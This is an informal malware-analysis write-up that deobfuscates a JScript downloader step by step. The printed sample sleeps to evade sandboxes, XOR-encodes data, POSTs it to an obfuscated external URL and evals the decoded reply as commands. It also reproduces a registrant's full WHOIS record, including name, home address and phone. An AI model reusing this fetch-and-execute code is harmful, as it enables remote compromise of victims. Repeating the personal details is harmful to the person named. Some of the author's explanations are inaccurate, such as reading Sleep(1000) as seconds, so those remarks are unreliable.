A Malware Analysis on a file I found in the wild.
https://www.virustotal.com/gui/file-analysis/MTY0YThhNmFlN2E1NTY1N2VjMTRkMzMzMjI3ZjQ1Mzc6MTY3NDQ5MTU1NQ==
Please note that this is a live sample of malware and should be handled with care.
Entry Code
var url = vfiranoz.garnacizig('mstuy.jyvlqiymsaffp-nljllihha.vnzepxa.e4ddqdm9o4s1n3o7j/t/y:qsnpktqtqha')+vfiranoz.garnacizig('tgxnqpa.aluevxeiypp/g');
var nepdu = ['a', '501'];
nepdu.push('263');
vfiranoz.xaspujxy();
var spediafna8 = request(nepdu);
this['eval'](spediafna8);
I renamed nepdu to arguments.
var arguments = ['a', '501', '263']
xaspujxy : function () {
var uxoxkah = vfiranoz.pevybvu();
var uhsnamoz = uxoxkah + 10000;
while (uxoxkah < uhsnamoz) {
uxoxkah = vfiranoz.pevybvu();
vfiranoz.sitxogi();
}
},
Variable uxoxkah is set to the return value of pevybvu().
pevybvu : function () {
return (new Date)['getTime']();
},
I renamed pevybvu to getTime() and uxoxkah to currentTime.
sitxogi : function () {
var coyb = 'Sleep';
WScript[coyb](1000);
},
This function is calling Sleep() for 1000 seconds. I renamed sitxogi to SleepFor1000Seconds(). I also removed the unnecessary variable declaration.
The time calculated by getTime() is then added to 10000 I renamed this var from uhsnamoz to waitPeriod.
The function then sleeps until the waitPeriod equals the currentTime. I renamed the function xaspujxy to wait.
function request(nypzpa) {
var cmumavhpa = Malware.aczeg(Malware.izwgesil(nypzpa));
return Malware.qyap(cmumavhpa);
}
I renamed nypzpa to args. This functions seems to be making a networking request.
izwgesil : function (args) {
var qyphneax = '';
for (var nadhon8 = 0; nadhon8 < args['length']; nadhon8++) {
if(args[nadhon8][0]) {
qyphneax += args[nadhon8][0] + '=' + encodeURIComponent(''+args[nadhon8][1]) + '&';
} else {
qyphneax += nadhon8 + '=' + encodeURIComponent(''+args[nadhon8]) + '&';
}
}
return Malware.napo(qyphneax);
},
The encodeURIComponent() function encodes a URI by replacing each instance of certain characters by one, two, three, or four escape sequences representing the UTF-8 encoding of the character (will only be four escape sequences for characters composed of two "surrogate" characters).
This functions seems to be generating the url. I renamed nadhon8 to i and qyphneax to finalString.
napo : function (rucuzwalrow) {
var ukleq = 151;
var ypjacxy = Malware.mwypko(ukleq);
for (var nadhon8 = 0; nadhon8 < rucuzwalrow['length']; nadhon8++) {
ypjacxy += Malware.mwypko(rucuzwalrow['charCodeAt'](nadhon8) ^ ukleq);
}
return ypjacxy;
},
Immediately the function mwypko is beind called and ukleq (151) is being passed into it. I renamed ukleq to num and nadhon8 to i.
mwypko : function (num) {
var ijiv = '00';
var kokuwut = ijiv+num['toString'](16);
return kokuwut['substr'](kokuwut['length']-2);
},
When I run and compile the code above it returns 97. I renamed this function to calcChar. I renamed ypjacxy in napo to chars.
Lets try to compile what we gathered so far
Hmmm looks like some type of hash? This hash is then passed to aczeg()
aczeg : function (hash) {
try {
var leczu;
leczu = new ActiveXObject('MSXML2.XMLHTTP');
leczu['open']('POST', url, false);
leczu['send'](hash);
return leczu['responseText'];
} catch (e) {}
}
This function seems to be sending a post request to the url.
var url = Malware.garnacizig('mstuy.jyvlqiymsaffp-nljllihha.vnzepxa.e4ddqdm9o4s1n3o7j/t/y:qsnpktqtqha')+Malware.garnacizig('tgxnqpa.aluevxeiypp/g');
This long text is passed into the function garnacizig().
garnacizig : function (emblaol) {
var zruyqop = '';
for(var adqzieszek=0; adqzieszek<emblaol['length']; adqzieszek++) {
if(adqzieszek%2) {
zruyqop = emblaol['substr'](adqzieszek, 1) + zruyqop;
}
}
return zruyqop;
},
I renamed emblaol to url adqzieszek to i, zruyqop to generatedUrl and garnacizig to generateURL. Lets try to compile what we gathered so far.
Aha! We located an URL.
Domain Name: hill-family.us
Registry Domain ID: D2669125-US
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: whois.godaddy.com
Updated Date: 2020-06-24T15:58:47Z
Creation Date: 2002-07-19T06:55:39Z
Registry Expiry Date: 2022-07-18T23:59:59Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: email@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Registry Registrant ID: C23536749-US
Registrant Name: Patrick Hill
Registrant Organization: None
Registrant Street: 313 109th Ave SE
Registrant Street:
Registrant Street:
Registrant City: Bellevue
Registrant State/Province: Washington
Registrant Postal Code: 98004
Registrant Country: US
Registrant Phone: +1.4244537459
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: email@hill-family.us
Registrant Application Purpose: P3
Registrant Nexus Category: C31/US
Registry Admin ID: C23536752-US
Admin Name: Patrick Hill
Admin Organization: None
Admin Street: 313 109th Ave SE
Admin Street:
Admin Street:
Admin City: Bellevue
Admin State/Province: Washington
Admin Postal Code: 98004
Admin Country: US
Admin Phone: +1.4244537459
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: email@hill-family.us
Admin Application Purpose: P3
Admin Nexus Category: C31/US
Registry Tech ID: C23536751-US
Tech Name: Patrick Hill
Tech Organization: None
Tech Street: 313 109th Ave SE
Tech Street:
Tech Street:
Tech City: Bellevue
Tech State/Province: Washington
Tech Postal Code: 98004
Tech Country: US
Tech Phone: +1.4244537459
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: email@hill-family.us
Tech Application Purpose: P3
Tech Nexus Category: C31/US
Name Server: ns78.domaincontrol.com
Name Server: ns77.domaincontrol.com
DNSSEC: unsigned
https://urlscan.io/result/b2cb2fca-b753-41a4-9390-965f31bb3d59/
This website contacted 1 IPs in 1 countries across 1 domains to perform 1 HTTP transactions. The main IP is 87.249.50.201, located in Russian Federation and belongs to ARTNET2, PL. The main domain is bd5447b0.xen.hill-family.us.
TLS certificate: Issued by ZeroSSL RSA Domain Secure Site CA on November 27th 2021. Valid for: 3 months.
The result of this request is then passed to qyap()
qyap : function (request) {
if(!request) return '';
var ukleq = parseInt(request['substr'](0, 2), 16);
var cawpahowa = request['substr'](2);
var ypjacxy = '';
for (var nadhon8 = 0; nadhon8 < cawpahowa['length']; nadhon8+=2) {
ypjacxy += String['fromCharCode'](parseInt(cawpahowa['substr'](nadhon8, 2), 16) ^ ukleq);
}
return ypjacxy;
},
This function seems to decrypt the specifed request
Finally the commands in the request are ran. At the time of updating this report the domain is down, so I was unable to grab the commands.
this['eval'](spediafna8);